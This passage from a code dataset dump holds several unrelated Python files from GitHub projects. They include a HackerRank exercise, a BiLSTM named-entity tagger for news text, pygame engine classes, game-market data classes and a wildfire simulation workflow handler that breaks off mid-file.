for _ in range(0, 10): \r\n agent_x = OneStepAheadAgent(X)\r\n agent_o = MinimaxAgent(O)\r\n agent_referee = RegularReferee()\r\n sim = Simulator(agent_x, agent_o, agent_referee)\r\n judgement = sim.run()\r\n judgement_counts[judgement] = judgement_counts.get(judgement, 0) + 1\r\n\r\n for key in sorted(judgement_counts.keys(), key=lambda x: x.value):\r\n print(f\"{key}: {judgement_counts[key]}\")\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"pauldw/game-agents","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":17811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19885309341","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'plusMinus' function below.\n#\n# The function accepts INTEGER_ARRAY arr as parameter.\n#\n\ndef plusMinus(arr):\n #* Constraints:\n #* 1. : 0 < n <= 100\n #* 2. : -100 <= arr[i] <= 100\n \n if not 0 < n <= 100:\n raise TypeError(\"n must be between 0 and 100\")\n positives = 0\n negatives = 0\n zeros = 0\n for i in arr:\n if not -100 <= i <= 100:\n raise TypeError(\"integers must be between -100 and 100\")\n if i > 0:\n positives += 1\n if i < 0:\n negatives += 1\n if i ==0:\n zeros += 1\n print(f\"\"\"{format(positives/n, \".6f\")}\n{format(negatives/n, \".6f\")}\n{format(zeros/n, \".6f\")}\"\"\")\n\nif __name__ == '__main__':\n \n n = int(input().strip())\n\n arr = list(map(int, input().rstrip().split()))\n\n plusMinus(arr)\n","repo_name":"pybalt/HackerRank","sub_path":"WEEKS/1/Plus Minus/plusminus.py","file_name":"plusminus.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1201936021","text":"import numpy as np\nimport pandas as pd\nimport re\nimport os\nimport json\n\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom biLSTM import load_data, preprocess_data, tozenizer, biLSTM\n\n\ndef split_into_sentences(text):\n \"\"\"\n This function can split the entire text of Huckleberry Finn into sentences in about 0.1 seconds\n and handles many of the more painful edge cases that make sentence parsing non-trivial \n e.g. \"Mr. John Johnson Jr. was born in the U.S.A but earned his Ph.D. in Israel before joining \n Nike Inc. as an engineer. He also worked at craigslist.org as a business analyst.\"\n \"\"\"\n \n alphabets= \"([A-Za-z])\"\n prefixes = \"(Mr|St|Mrs|Ms|Dr)[.]\"\n suffixes = \"(Inc|Ltd|Jr|Sr|Co)\"\n starters = \"(Mr|Mrs|Ms|Dr|He\\s|She\\s|It\\s|They\\s|Their\\s|Our\\s|We\\s|But\\s|However\\s|That\\s|This\\s|Wherever)\"\n acronyms = \"([A-Z][.][A-Z][.](?:[A-Z][.])?)\"\n websites = \"[.](com|net|org|io|gov)\"\n \n text = \" \" + text + \" \"\n text = text.replace(\"\\n\",\" \")\n text = re.sub(prefixes,\"\\\\1\",text)\n text = re.sub(websites,\"\\\\1\",text)\n if \"Ph.D\" in text: text = text.replace(\"Ph.D.\",\"PhD\")\n text = re.sub(\"\\s\" + alphabets + \"[.] \",\" \\\\1 \",text)\n text = re.sub(acronyms+\" \"+starters,\"\\\\1 \\\\2\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\\\\3\",text)\n text = re.sub(alphabets + \"[.]\" + alphabets + \"[.]\",\"\\\\1\\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.] 
\"+starters,\" \\\\1 \\\\2\",text)\n text = re.sub(\" \"+suffixes+\"[.]\",\" \\\\1\",text)\n text = re.sub(\" \" + alphabets + \"[.]\",\" \\\\1\",text)\n if \"”\" in text: text = text.replace(\".”\",\"”.\")\n if \"\\\"\" in text: text = text.replace(\".\\\"\",\"\\\".\")\n if \"!\" in text: text = text.replace(\"!\\\"\",\"\\\"!\")\n if \"?\" in text: text = text.replace(\"?\\\"\",\"\\\"?\")\n text = text.replace(\".\",\" .\")# text = text.replace(\".\",\".\")\n text = text.replace(\"?\",\" ?\")# text = text.replace(\"?\",\"?\")\n text = text.replace(\"!\",\" !\")# text = text.replace(\"!\",\"!\")\n text = text.replace(\"\",\".\")\n \n text = text.replace('\"', ' \" ')\n text = text.replace(\"\\'s\", \" \\'s\")\n text = text.replace(\",\", \" ,\")\n \n sentences = text.split(\"\")\n sentences = sentences[:-1]\n sentences = [s.strip() for s in sentences]\n \n return sentences\n\ndef process_ner(sentence, bio):\n \n joined = []\n for w, pred in zip(sentence, bio):\n joined.append((w,pred))\n \n i = 0\n ner_list = []\n while i < len(joined):\n if joined[i][1] != 0 and joined[i][1] != 1:\n ner = []\n ner.append(joined[i])\n i += 1\n\n while joined[i][1] != 0 and joined[i][1] != 1:\n ner.append(joined[i])\n i += 1\n \n word = \" \".join([x[0] for x in ner])\n entity = ner[0][1]\n# entity = index_to_ner[ner[0][1]]\n ner_list.append((word, entity))\n else:\n i += 1\n \n return ner_list\n\n\ndef ner_extract_from_text(model, text, word_to_index):\n max_len = 70\n ner_dict = {'Geographical Entity':[], 'Organization':[], 'Person':[], 'Geopolitical Entity':[],\n 'Time indicator':[], 'Artifact':[], 'Event':[], 'Natural Phenomenon':[]}\n \n for sentence in text:\n new_sentence = sentence.lower().split()\n\n new_X=[]\n for w in new_sentence:\n try:\n new_X.append(word_to_index.get(w,1))\n except KeyError:\n new_X.append(word_to_index['OOV'])\n # 모델이 모르는 단어에 대해서는 'OOV'의 인덱스인 1로 인코딩\n\n pad_new = pad_sequences([new_X], padding=\"post\", value=0, maxlen=max_len)\n\n p = model.predict(np.array([pad_new[0]]))\n p = np.argmax(p, axis=-1)\n\n ner_list = process_ner(new_sentence, p[0])\n\n for entity in ner_list:\n if entity[1] == 2:\n ner_dict['Geographical Entity'].append(entity[0])\n elif entity[1] == 3:\n ner_dict['Time indicator'].append(entity[0])\n elif entity[1] == 4:\n ner_dict['Organization'].append(entity[0])\n elif entity[1] == 6:\n ner_dict['Person'].append(entity[0])\n elif entity[1] == 8:\n ner_dict['Geopolitical Entity'].append(entity[0])\n elif entity[1] == 11:\n ner_dict['Artifact'].append(entity[0])\n elif entity[1] == 12:\n ner_dict['Event'].append(entity[0])\n elif entity[1] == 15:\n ner_dict['Natural Phenomenon'].append(entity[0])\n \n return ner_dict\n\n\ndef main():\n nerDataPath = 'Data/entity-annotated-corpus/ner_dataset.csv'\n newsDataPath = 'Data/news/'\n model_weights = 'bi_lstm_crf_weight.h5'\n\n datapaths = os.listdir(newsDataPath)\n\n df = pd.DataFrame()\n\n for p in datapaths:\n with open(newsDataPath + p, 'r') as f:\n data = json.load(f)\n\n dataframe = pd.DataFrame.from_dict(data)\n df = df.append(dataframe)\n\n df = df.reset_index(drop=True)\n \n # word_to_index를 얻기 위한 작업\n nerData = load_data(nerDataPath)\n sentences, ner_tags = preprocess_data(nerData)\n\n src_tokenizer, _ = tozenizer(sentences, ner_tags)\n word_to_index = src_tokenizer.word_index\n\n # bi-LSTM CRF model\n model = biLSTM()\n print(\"loading weight to bi-LSTM model...\")\n model.load_weights(model_weights)\n\n #\n ner_df = pd.DataFrame()\n for i in range(df.shape[0]):\n # if i % 1000 == 0:\n print(i, \"rows are 
done\")\n\n row = df.iloc[0]\n body = row[' body']\n sentence_split = split_into_sentences(body)\n\n ner_dict = ner_extract_from_text(model=model, text=sentence_split, word_to_index=word_to_index)\n\n val_list = list(ner_dict.values())\n joined_val_list = []\n for val in val_list:\n joined_val = ','.join(val)\n joined_val_list.append(joined_val)\n\n ner = pd.DataFrame(data=[joined_val_list], columns=list(ner_dict.keys()))\n ner_df.append(ner)\n\n ner_df = ner_df.reset_index(drop=True)\n\n print(\"NER tagging process done\")\n\n merged_df = pd.merge(df, ner_df)\n merged_df.to_csv(\"Data/ner_result.csv\", mode='w')\n\n print(\"saved to csv file.\")\n\nif __name__ == \"__main__\":\n main()\n\n\n'''\ntext = ['The United States announced retaliatory sanctions on North Korea on Friday in response to the communist nation \\'s alleged cyber-attacks on Sony Pictures , warning the actions are just the \" first aspect \" of its response .',\n 'President Barack Obama signed an executive order authorizing additional sanctions on North Korean individuals and entities in response to the North \\'s \" ongoing provocative , destabilizing , and repressive actions and policies , particularly its destructive and coercive cyber attack on Sony , \" the White House said in a statement .',\n \"Three North Korean entities and 10 officials were named in the sanctions , including the Reconnaissance General Bureau , Pyongyang 's primary intelligence organization , accused of arms trading and other activities banned under U.N. resolutions , according to the Treasury Department .\",\n 'Though those sanctioned are barred from using the U.S. financial system and U.S. citizens are banned from doing business with them , the measures are considered largely symbolic because the North has already been under a string of international sanctions and those newly sanctioned are not believed to have any dealings with the U.S. \" We take seriously North Korea \\'s attack that aimed to create destructive financial effects on a U.S. 
company and to threaten artists and other individuals with the goal of restricting their\\xa0right to free expression , \" the White House said \" .',\n \"As the president has said , our response to North Korea 's attack against Sony Pictures Entertainment will be proportional , and will take place at a time and in a manner of our choosing .\",\n 'Today \\'s actions are the first aspect of our response , \" it said .',\n 'The FBI has determined that North Korea was behind the hack on Sony , confirming widespread suspicions pointing to the North that has expressed strong anger at a Sony movie , \" The Interview , \" which involves a plot to assassinate North Korean leader Kim Jong-un .',\n 'Obama has since vowed to \" respond proportionally \" to the attacks .',\n 'North Korea has denied any responsibility , though it lauded the Sony hack as a \" righteous deed \" .',\n '\" The order is not targeted at the people of North Korea , but rather is aimed at the government of North Korea and its activities that threaten the United States and others , \" Obama said in a letter to House of Representatives and Senate leaders .',\n 'The two other newly sanctioned North Korean entities are Korea Mining Development and Trading Corp .',\n '(KOMID) and Korea Tangun Trading Corp .',\n 'Eight of the 10 sanctioned individuals were KOMID officials stationed in Iran , Syria , Russia and Namibia .',\n \"KOMID is the North 's primary arms dealer and main exporter of goods and equipment related to ballistic missiles and conventional weapons , according to the Treasury Department .\",\n 'The company was previously sanctioned by the U.S. and the United Nations , it said .',\n 'Korea Tangun Trading Corp .',\n \"is responsible for the procurement of commodities and technologies to support the North 's defense research and development program .\",\n 'The company was also a target of U.S. and U.N. sanctions , the department said .',\n 'The sanctioned individuals include KOMID officials Kil Jong-hun , Kim Kwang-yon , Jang Song-chol , Kim Yong-chol , Jang Yong-son , Kim Kyu , Ryu Jin and Kang Ryong , as well as Yu Kwang-ho , a North Korean government official , and Kim Kwang-chun , a Tangun Trading Corp .',\n 'official \" .',\n 'Today \\'s actions are driven by our commitment to hold North Korea accountable for its destructive and destabilizing conduct , \" Secretary of the Treasury Jacob Lew said in a statement .',\n '\" Even as the FBI continues its investigation into the cyber-attack against Sony Pictures Entertainment , these steps underscore that we will employ a broad set of tools to defend U.S. businesses and citizens , and to respond to attempts to undermine our values or threaten the national security of the United States \" .',\n \"The new sanctions also underline the confidence the U.S. has in blaming the North for the Sony hack despite growing doubts about the FBI 's finding among American cyber-security specialists .\",\n \"Last week , a cyber-security firm , Norse , was reported to have briefed the FBI on the result of its own investigation that it was not North Korea , but laid-off Sony staff members that disrupted Sony 's computer network .\",\n 'On Friday , Scott Borg , director and chief economist of the U.S. 
Cyber Consequences Unit , an independent , nonprofit research institute specializing on cyber-threats and risks , also said in a commentary on the CNBC website that the skills employed in the Sony hack were too sophisticated for the North .']\n\ndataPath = 'Data/entity-annotated-corpus/ner_dataset.csv'\nmodel_weights = 'bi_lstm_crf_weight.h5'\n\ndata = load_data(dataPath)\nsentences, ner_tags = preprocess_data(data)\n\nsrc_tokenizer, _ = tozenizer(sentences, ner_tags)\nword_to_index = src_tokenizer.word_index\n\nmodel = biLSTM()\nprint(\"loading weight to bi-LSTM model...\")\nmodel.load_weights(model_weights)\n\n\nprint(ner_extract_from_text(model, text, word_to_index))\n'''\n\n\n","repo_name":"LeeDongYeun/news-stream-data-analysis","sub_path":"ner_tagging.py","file_name":"ner_tagging.py","file_ext":"py","file_size_in_byte":11651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5422516335","text":"import pygame\nfrom engine.sprite import *\nfrom pathlib import Path\nimport platform\n\nSOURCEPATH = Path(__file__).parents[1]\n\ndef run_cmd(path):\n if platform.system() == \"Linux\":\n if not os.access(os.path.abspath(os.path.join(SOURCEPATH, path)), os.X_OK):\n return sys.executable + \" \" + os.path.abspath(os.path.join(SOURCEPATH, path))\n return os.path.abspath(os.path.join(SOURCEPATH, path))\n\ndef source_path(path):\n return os.path.abspath(os.path.join(SOURCEPATH, path))\n\nclass Object:\n def __init__(self,x,y,width,height,imagefile=\"\",readyimage=False,isrect=True,color=pygame.Color(\"white\")):\n self.x=x\n self.readyimage=readyimage\n self.y=y\n self.width=width\n self.height=height\n self.isrect=isrect\n self.imagefile=imagefile\n self.color=color\n\n if self.isrect:\n self.rect=pygame.Rect(x,y,width,height)\n else:\n if self.imagefile != \"\":\n if not self.readyimage:\n self.image=pygame.image.load(self.imagefile)\n else:\n self.image=imagefile\n self.rect=self.image.get_rect()\n else:\n raise Exception(\"Object must have an imagefile or be a rect\")\n\n def change_image(self,imagefile):\n self.imagefile=imagefile\n self.image=pygame.image.load(self.imagefile)\n self.rect=self.image.get_rect()\n\n def update(self):\n if self.isrect:\n self.rect=pygame.Rect(self.x,self.y,self.width,self.height)\n else:\n self.rect=self.image.get_rect()\n self.rect.x=self.x\n self.rect.y=self.y\n self.width=self.rect.width\n self.height=self.rect.height\n \n def change_position(self,x,y):\n self.x=x\n self.y=y\n self.update()\n\n \n def draw(self,screen):\n if self.isrect:\n screen.fill(self.color,self.rect)\n else:\n screen.blit(self.image,self.rect)\n \nclass Platform:\n \"\"\"Creates Platform\"\"\"\n def __init__(self,y,x,spritefile=source_path(\"sprites.png\")):\n self.spritefile=spritefile\n self.sprites=Spritesheet(self.spritefile)\n self.left=self.sprites.get(0,0)\n self.center=self.sprites.get(0,1)\n self.right=self.sprites.get(0,2)\n self.y=y\n self.x=x\n self.rect=pygame.Rect(self.x,self.y,self.sprites.part_size[0]*3,self.sprites.part_size[1])\n \n def change_position(self,x,y):\n self.x=x\n self.y=y\n self.update()\n\n def update(self):\n self.rect=pygame.Rect(self.x,self.y,self.sprites.part_size[0]*3,self.sprites.part_size[1])\n \n def draw(self,screen):\n screen.blit(self.left,(self.x,self.y))\n screen.blit(self.center,(self.x+32,self.y))\n 
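# right cap tile completes the platform; the +32/+64 offsets assume 32px-wide sprite parts\n        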
screen.blit(self.right,(self.x+64,self.y))\n","repo_name":"kerem3338/mission-akne","sub_path":"engine/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":2886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11182874200","text":"# coding: utf-8\nimport datetime\n\nfrom dext.common.utils import s11n\n\nfrom the_tale.finances.market import conf\n\n\nclass Good(object):\n __slots__ = ('type', 'name', 'uid', 'item')\n\n def __init__(self, type, name, uid, item):\n self.type = type\n self.name = name\n self.uid = uid\n self.item = item\n\n def serialize(self):\n from the_tale.finances.market import goods_types\n return {'type': self.type,\n 'name': self.name,\n 'uid': self.uid,\n 'item': goods_types.get_type(self.type).serialize_item(self.item)}\n\n @classmethod\n def deserialize(cls, data):\n from the_tale.finances.market import goods_types\n obj = cls(type=data['type'],\n name=data['name'],\n uid=data['uid'],\n item=goods_types.get_type(data['type']).deserialize_item(data['item']))\n return obj\n\n\n def html_label(self):\n from the_tale.finances.market import goods_types\n return goods_types.get_type(self.type).item_html(self.item)\n\n def group(self):\n from the_tale.finances.market import goods_types\n return goods_types.get_type(self.type).group_of(self.item)\n\n\n\nclass Lot(object):\n\n __slots__ = ('id', 'type', 'name', 'seller_id', 'buyer_id', 'state', 'good', 'price', 'created_at', 'commission', 'closed_at', 'group_id')\n\n def __init__(self, id, type, name, seller_id, buyer_id, state, good, price, created_at, commission, closed_at, group_id):\n self.id = id\n self.type = type\n self.name = name\n self.seller_id = seller_id\n self.buyer_id = buyer_id\n self.state = state\n self.good = good\n self.price = price\n self.created_at = created_at\n self.closed_at = closed_at\n self.commission = commission\n self.group_id = group_id\n\n @property\n def time_to_end(self):\n return max(self.created_at + datetime.timedelta(days=conf.settings.LOT_LIVE_TIME) - datetime.datetime.now(), datetime.timedelta(days=0))\n\n @classmethod\n def from_model(cls, model):\n data = s11n.from_json(model.data)\n\n return cls(id=model.id,\n created_at=model.created_at,\n type=model.type,\n name=model.name,\n seller_id=model.seller_id,\n buyer_id=model.buyer_id,\n state=model.state,\n good=Good.deserialize(data['good']),\n price=model.price,\n closed_at=model.closed_at,\n commission=model.commission,\n group_id=model.group_id)\n\n def to_model_fields(self):\n data = {'type': self.type,\n 'name': self.name,\n 'seller': self.seller_id,\n 'buyer': self.buyer_id,\n 'state': self.state,\n 'good_uid': self.good.uid,\n 'data': s11n.to_json({'good': self.good.serialize()}),\n 'price': self.price,\n 'closed_at': self.closed_at,\n 'commission': self.commission,\n 'group_id': self.group_id}\n return data\n\n\nclass Goods(object):\n __slots__ = ('id', 'account_id', '_goods')\n\n def __init__(self, id, account_id, goods):\n self.id = id\n self.account_id = account_id\n self._goods = goods\n\n\n @classmethod\n def from_model(cls, model):\n data = s11n.from_json(model.data)\n\n goods = {}\n for good_data in data.get('goods', ()):\n good = Good.deserialize(good_data)\n goods[good.uid] = good\n\n return cls(id=model.id,\n account_id=model.account_id,\n goods=goods)\n\n def to_model_fields(self):\n goods = [good.serialize() for good in self._goods.itervalues()]\n return {'data': s11n.to_json({'goods': goods})}\n\n def add_good(self, good):\n 
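# goods are keyed by uid, so adding a good whose uid already exists overwrites the previous entry\n        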
self._goods[good.uid] = good\n\n def get_good(self, good_uid):\n return self._goods.get(good_uid)\n\n def has_good(self, good_uid):\n return self.get_good(good_uid) is not None\n\n def remove_good(self, good_uid):\n if self.has_good(good_uid):\n del self._goods[good_uid]\n\n def goods_count(self):\n return len(self._goods)\n\n def has_goods(self):\n return bool(self.goods_count())\n\n def all(self):\n return sorted(self._goods.itervalues(), key=lambda good: good.name)\n\n def clear(self):\n self._goods = {}\n","repo_name":"qqname/the-tale","sub_path":"the_tale/finances/market/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"22284334731","text":"from dags.dbo.oracle_market_data_model import AIndexEODPrices, Oracle_Session\nfrom terminal.utils import DateTimeUtils\nfrom terminal import Logging\n\nlogger = Logging.getLogger(__name__)\n\n\nclass OracleAIndexEODPricesRepo:\n\n @staticmethod\n def get_a_index_eod_prices_by_date(trade_date):\n \"\"\"\n 根据时间获取数据\n :param trade_date:\n :return:\n \"\"\"\n logger.info('开始从a_index_eod_prices表获取日期为: %s的数据' % trade_date)\n oracle_session = Oracle_Session()\n a_index_eod_prices = oracle_session.query(AIndexEODPrices). \\\n filter(AIndexEODPrices.TRADE_DT == DateTimeUtils.date2str(trade_date, '%Y%m%d')).all()\n oracle_session.close()\n if len(a_index_eod_prices) == 0 or a_index_eod_prices is None:\n logger.info('从a_index_eod_prices表没有获取到日期为: %s的数据' % trade_date)\n return []\n\n logger.info('时间为: %s,在a_index_eod_prices表查询到了%d条数据' %\n (trade_date, len(a_index_eod_prices)))\n\n return a_index_eod_prices\n","repo_name":"zhanrendong/jkzx1","sub_path":"scripts/airflow/dags/dao/orcale_a_index_eod_prices_repo.py","file_name":"orcale_a_index_eod_prices_repo.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40581859993","text":"import json\n\nimport requests\n\nfrom cli.utils import fetch_auth\n\n\n@fetch_auth\ndef fetch_accounts(filters, url, auth_headers):\n \"\"\"fetch accounts\n\n Fetch accounts from ZumoLabs backend.\n\n Args:\n filters (dict): query param filters for API call\n url (str): backend endpoint\n auth_headers: authentication for backend\n \"\"\"\n endpoint = f\"{url}/api/v1/accounts/\"\n r = requests.get(endpoint, headers=auth_headers, params=filters)\n if r.status_code != 200:\n r.raise_for_status()\n return json.loads(r.text)[\"results\"]\n","repo_name":"ZumoLabs/zpy","sub_path":"cli/accounts.py","file_name":"accounts.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":279,"dataset":"github-code","pt":"37"} +{"seq_id":"29568069313","text":"import sys\nimport json\nimport pony.orm as pny\nfrom Database.workflow import Simulation, Incident\nfrom SimulationManager.client import createSimulation, submitSimulation, SimulationManagerException, cancelSimulation\nfrom DataManager.client import moveDataViaDM, DataManagerException, getInfoForDataInDM, putByteDataViaDM, \\\n registerDataWithDM, copyDataViaDM, getByteDataViaDM\nfrom manager import workflow\nimport yaml\nimport datetime\n\n\nclass WildfireDataAccessException(Exception):\n def __init__(self, msg):\n self.msg = msg\n\n\n@workflow.handler\ndef wildfire_fire_static(msg):\n print(\"\\nPreparing static data for wildfire analyst\")\n\n msg[\"file\"] = \"Static wildfire analyst file\"\n\n workflow.send(msg, 
\"wildfire_fire_simulation\")\n\n\n@workflow.atomic\n@workflow.handler\ndef wildfire_fire_simulation(msg):\n print(\"\\nWildfire fire simulation handler\")\n IncidentID = msg[\"IncidentID\"]\n originator = msg[\"originator\"]\n\n # if originator == \"wildfire_fire_static\":\n # print(\"Static data received\")\n # workflow.Persist.Put(IncidentID,{\"originator\": originator, \"file\": file})\n # el\n if originator == \"wildfire_mesonh_results\":\n print(\"MesoNH forecast data received\")\n workflow.Persist.Put(IncidentID, {\"originator\": originator, \"weather_data_uuid\": msg[\"weather_data_uuid\"]})\n elif originator == \"wildfire_tecnosylva_hotspots\":\n print(\"Hotspots from Tecnosylva received\")\n workflow.Persist.Put(IncidentID, {\"originator\": originator, \"hotspot_data_uuid\": msg[\"hotspot_data_uuid\"]})\n else:\n raise ValueError(\"Unexpected originator %s\" % originator)\n\n logs = workflow.Persist.Get(IncidentID)\n\n # get the latest data for all 3 required data types\n # staticFile = None\n hotspotDataUUID = None\n weatherDataUUID = None\n for log in logs:\n if log[\"originator\"] == \"wildfire_fire_static\":\n staticFile = log[\"file\"]\n elif log[\"originator\"] == \"wildfire_tecnosylva_hotspots\":\n hotspotDataUUID = log[\"hotspot_data_uuid\"]\n elif log[\"originator\"] == \"wildfire_mesonh_results\":\n weatherDataUUID = log[\"weather_data_uuid\"]\n\n # if staticFile is not None and hotspotFile is not None and weatherFile is not None:\n if hotspotDataUUID and weatherDataUUID is not None:\n print(\"Dependencies met for WFA\")\n\n try:\n weather_data_info = getInfoForDataInDM(weatherDataUUID)\n except DataManagerException as err:\n print(\"Can not retrieve DM information for weather data \" + err.message)\n return\n\n try:\n callbacks = {'COMPLETED': 'wildfire_fire_results'}\n sim_id = createSimulation(IncidentID, 1, \"0:05:00\", \"Wildfire simulation\", \"wfa.sh\",\n queuestate_callbacks=callbacks, template_dir=\"templates/wildfire_template\",\n comment=\"Execution linked to hotspot data \" + hotspotDataUUID)[0]\n with pny.db_session:\n simulation = Simulation[sim_id]\n machine_name = simulation.machine.machine_name\n machine_basedir = simulation.machine.base_work_dir\n if machine_basedir[-1] != \"/\": machine_basedir += \"/\"\n\n hotspotData = getByteDataViaDM(hotspotDataUUID).decode('ascii')\n hotspot_dict = json.loads(hotspotData)\n\n if \"simDuration\" in hotspot_dict:\n simDuration = hotspot_dict['simDuration']\n else:\n print(\"Simulation duration (key simDuration) not in hotspot JSON data. 
This is required\")\n return\n if \"numberOfSims\" in hotspot_dict:\n numberOfSims = hotspot_dict['numberOfSims']\n else:\n numberOfSims = 2\n\n moveDataViaDM(hotspotDataUUID, machine_basedir + simulation.directory + \"/WFA_hotspots.json\", machine_name)\n\n try:\n putByteDataViaDM(\"wfa-template.yml\", machine_name, \"Wildfire configuration\", \"text/plain\", \"Wildfire workflow\",\n _buildWFAYaml(IncidentID, weather_data_info, simDuration, numberOfSims), path=simulation.directory)\n except DataManagerException as err:\n print(\"Can not write wildfire configuration to simulation location\" + err.message)\n return\n\n submitSimulation(sim_id)\n except SimulationManagerException as err:\n print(\"Error creating or submitting WFA simulation \" + err.message)\n return\n\n\n@pny.db_session\ndef _buildWFAYaml(incidentId, weather_datainfo, simDuration, sims_per_rank):\n myincident = Incident[incidentId]\n upperLeft = myincident.upper_left_latlong\n lowerRight = myincident.lower_right_latlong\n\n upperLeftLon, upperLeftLat = upperLeft.split(\"/\")\n lowerRightLon, lowerRightLat = lowerRight.split(\"/\")\n\n sample_configuration_file = open(\"workflows/wildfire/templates/wfa-template.yml\")\n yaml_template = yaml.load(sample_configuration_file, Loader=yaml.FullLoader)\n yaml_template[\"upperleft\"][\"lat\"] = float(upperLeftLat)\n yaml_template[\"upperleft\"][\"lon\"] = float(upperLeftLon)\n yaml_template[\"lowerright\"][\"lat\"] = float(lowerRightLat)\n yaml_template[\"lowerright\"][\"lon\"] = float(lowerRightLon)\n\n yaml_template[\"weather_data\"][\"path\"] = weather_datainfo[\"absolute_path\"]\n yaml_template[\"dynamic_config\"][\"path\"] = \"WFA_hotspots.json\"\n yaml_template[\"sim_duration\"] = simDuration\n yaml_template[\"sims_per_rank\"] = sims_per_rank\n\n return yaml.dump(yaml_template)\n\n\n@workflow.handler\ndef wildfire_fire_results(msg):\n IncidentID = msg[\"IncidentID\"]\n simulationId = msg[\"simulationId\"]\n simulationIdPostfix = simulationId.split(\"-\")[-1]\n directoryListing = msg[\"directoryListing\"]\n\n print(\"\\nResults available for wildfire analyst simulation!\")\n hotspotDataUUID = None\n if \"hotspot_data_uuid\" in msg:\n hotspotDataUUID = msg[\"hotspot_data_uuid\"]\n\n if hotspotDataUUID is not None:\n hotspotData = getByteDataViaDM(hotspotDataUUID).decode('ascii')\n hotspot_dict = json.loads(hotspotData)\n if \"simDuration\" in hotspot_dict:\n simDuration = hotspot_dict['simDuration']\n else:\n print(\"\\nSimulation duration (key simDuration) not in hotspot JSON data. This is required\")\n return\n else:\n print(\"\\nNo hotspot data UUID to retrieve simDuration. 
This is required\")\n return\n\n with pny.db_session:\n myincident = Incident[IncidentID]\n simulation = Simulation[simulationId]\n machine_name = simulation.machine.machine_name\n machine_basedir = simulation.machine.base_work_dir\n if machine_basedir[-1] != \"/\": machine_basedir += \"/\"\n\n if simulation is not None:\n result_files = {}\n for entry in directoryListing:\n tokens = entry.split()\n if len(tokens) == 9 and \".tif\" in tokens[8]:\n result_files[tokens[8]] = int(tokens[4])\n\n try:\n data_uuid_test_fire_best = _registerWFAResultFile(\"test_Fire_Best.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_fireshed_best = _registerWFAResultFile(\"test_FireShed_Best.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_variance = _registerWFAResultFile(\"test_Fire_Variance.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n data_uuid_test_mean = _registerWFAResultFile(\"test_Fire_Mean.tif\", result_files, machine_name,\n simulation.directory, IncidentID, simulationId)\n except WildfireDataAccessException as err:\n with pny.db_session:\n simulation = Simulation[simulationId]\n simulation.status = \"ERROR\"\n simulation.status_message = err.msg\n simulation.status_updated = datetime.datetime.now()\n pny.commit()\n return\n \n _registerMatchingFiles(directoryListing, \".vtu\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTU paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".pvtp\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"PVTP paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".vtp\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTP paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n \n _registerMatchingFiles(directoryListing, \".vti\", machine_name, \"WFA simulation\", \"application/octet-stream\", \"VTI paraview output\", \n simulation.directory, IncidentID, \"WFA paraview output file\", \"Created by WFA on \" + machine_name + \" with simulation ID \" + simulationId)\n\n\n try:\n callbacks = {'COMPLETED': 'wildfire_post_results'}\n pp_sim_id = createSimulation(IncidentID, 1, \"0:05:00\", \"Wildfire postprocessing\", \"wfapost.sh\",\n queuestate_callbacks=callbacks,\n template_dir=\"templates/wildfire_post_template\",\n comment=\"Executed following WFA simulation \" + simulationId)[0]\n with pny.db_session:\n post_proc_simulation = Simulation[pp_sim_id]\n post_proc_machine_name = post_proc_simulation.machine.machine_name\n\n try:\n putByteDataViaDM(\"wfapost.yml\", machine_name, \"Wildfire post-processing configuration\", \"text/plain\",\n \"Wildfire workflow\",\n _buildWFAPostYaml(simulation.directory, machine_basedir, simDuration),\n path=post_proc_simulation.directory)\n except DataManagerException as err:\n print(\"Can not write wildfire post processing configuration to simulation location\" + err.message)\n return\n\n submitSimulation(pp_sim_id)\n except SimulationManagerException as err:\n print(\"Error creating or submitting WFA 
